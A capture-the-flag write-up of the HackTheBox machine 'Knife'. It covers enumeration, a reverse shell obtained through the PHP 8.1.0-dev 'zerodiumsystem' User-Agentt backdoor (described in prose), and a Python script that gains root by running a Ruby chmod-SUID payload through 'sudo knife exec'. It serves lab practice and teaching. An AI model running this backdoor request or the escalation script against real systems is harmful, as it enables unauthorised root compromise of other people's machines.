Hacking Knife (hackthebox)

First of all, I performed an nmap port scan on all ports.




I had a look at the versions of SSH and Apache running and searched online for exploits for them. I found a Metasploit module (run from msfconsole) that enumerates SSH usernames and used it successfully. Unfortunately, a brute-force attack against the discovered usernames with default passwords and a password list did not work.

At the same time as the SSH attacks were running, I enumerated the website. I used Burp Suite's Repeater tool to look at the page's source code but could find nothing especially useful. I also ran DirBuster against it and used one of my own Python 3 tools to check for subdomains. These attacks did not turn up anything useful, so I went to bed!

As I was drifting off, I saw the website and its source code again in my mind, and suddenly had two realisations about what to try next. The first was that I could try tailor-made subdomains, directories and files: the top of the webpage had words which didn't link to anything, which I had already thought strange, and the use of / between them made me think of directories!


I was half-tempted to get up and give these names a go with my subdomain-finding tool and Burp Suite's Intruder tool, but I resisted the temptation and went to sleep! After work the next day, I did give them a go, trying different combinations of capital and lowercase letters, but this led to nothing new.

I then thought about the second clue which had flashed into my mind the night before. The words in the source code (patients, hospitals, providers) and the way they rendered in a browser led my mind to PHP!


I therefore returned to Burp Suite and used the Repeater tool to see whether the response headers gave away a PHP version. When I looked, I was happy to see that the clue had paid off: the X-Powered-By response header had the value PHP/8.1.0-dev.



I felt like this was the first breadcrumb in the trail to the solution, so I searched online for a PHP 8.1.0-dev exploit. It didn't take long to find the following interesting piece of information on GitHub:


I decided to give this a go in Burp Suite's Repeater tool. Things were finally feeling like I would soon have a shell on the target machine! :-)


The request needed a User-Agentt header (note the doubled t, as opposed to the normal User-Agent) whose value started with zerodiumsystem, followed by the command to be executed. For my command I used a shell one-liner that opened an interactive reverse shell over TCP back to my attacking machine on port 4444. I launched a Netcat listener on port 4444 before sending the amended GET request. Nothing showed up in the response pane, which is what you would expect: PHP's system() blocks until the command exits, and the reverse shell keeps running, so the HTTP response never completes. Sure enough, the shell had been generated successfully, and the user flag didn't take long to find... :-)



Before serving and downloading LinEnum onto the target, I thought I would try a couple of quick checks for privilege escalation. The first command I tried was sudo -l, which revealed that the user james could run a file called knife as root without a password. I checked out the file and saw that it was a symlink to another file called knife (the Chef command-line tool). I checked that in turn and discovered that it was a Ruby script.



Now I needed a way to leverage this permission to get a root shell. I first created a .rb file which used Ruby's system() method to run a shell command setting the SUID bit on /bin/bash, so that whoever ran it would get root's effective user ID. I then used james's ability to run knife as root to execute my newly created .rb file. I checked /bin/bash and found that the SUID bit was successfully set. Finally, it was just a matter of running /bin/bash with the -p flag, so that bash would keep the effective UID of root rather than dropping back to james.
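The privilege-escalation step as a small script to run as james on the box, added as an example and not code from the original write-up. The page only says that knife ran the .rb file as root; the script assumes knife's exec subcommand (the knife command that evaluates a Ruby file), the scratch path /tmp/priv.rb and the function names, all of which are my choices. It also includes an offline check of the SUID test on a scratch file, which works without root because any user may set the bit on a file they own.

```python
"""Added example (not from the original write-up): the sudo + knife
privilege escalation as a script run as james on the target.

Assumptions, not taken from the page: the function names, the scratch
path /tmp/priv.rb, and that knife is invoked as `knife exec <file.rb>`,
the knife subcommand that evaluates a Ruby file.
"""
import os
import stat
import subprocess
import tempfile

TARGET = "/bin/bash"


def knife_payload(target: str = TARGET) -> str:
    """Ruby source for knife exec: Ruby's system() runs chmod as root."""
    return f'system("chmod u+s {target}")\n'


def mode_has_suid(mode: int) -> bool:
    """True if the SUID bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def has_suid(path: str) -> bool:
    """True if PATH runs with its owner's effective UID (root for /bin/bash)."""
    return mode_has_suid(os.stat(path).st_mode)


def escalate(target: str = TARGET, script: str = "/tmp/priv.rb") -> bool:
    """Write the payload, run it through sudo knife exec, and report whether
    the bit landed.  Afterwards `bash -p` keeps the effective UID of root
    instead of dropping back to the real UID (james)."""
    with open(script, "w") as f:
        f.write(knife_payload(target))
    subprocess.run(["sudo", "knife", "exec", script], check=False)
    return has_suid(target)


def self_check() -> bool:
    """Offline check of has_suid on a scratch file we own: setting the
    SUID bit on your own file needs no root, so this runs anywhere."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        before = has_suid(path)          # mkstemp creates the file 0600
        os.chmod(path, 0o4755)           # same as `chmod u+s` plus 0755
        return (not before) and has_suid(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    if escalate():
        print(f"SUID set on {TARGET}; now run: {TARGET} -p")
    else:
        print("SUID bit not set; check `sudo -l` and the knife exec output")
```

On the box the whole chain is the three actions the paragraph describes: write the one-line Ruby file, run it via sudo knife, then start /bin/bash -p. Without -p, bash notices that the effective and real UIDs differ and resets the effective UID, which is why the flag matters.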


It did not take long to find the root flag... :-)



My favourite part of this machine was how the clues leading to the PHP exploit didn't register with me until I was nodding off to sleep. There was a sudden realisation when, in my mind, I saw the P H P on the website hammering home the clue which led to the eventual pwning of the box.

It was also nice to be able to play with Burp Suite's Intruder and Repeater tools and with HTTP headers, as I had been learning more about these a day or so before hacking this box!

Thanks to MrKN16H7 for creating it, and thank you for reading my write-up :-)
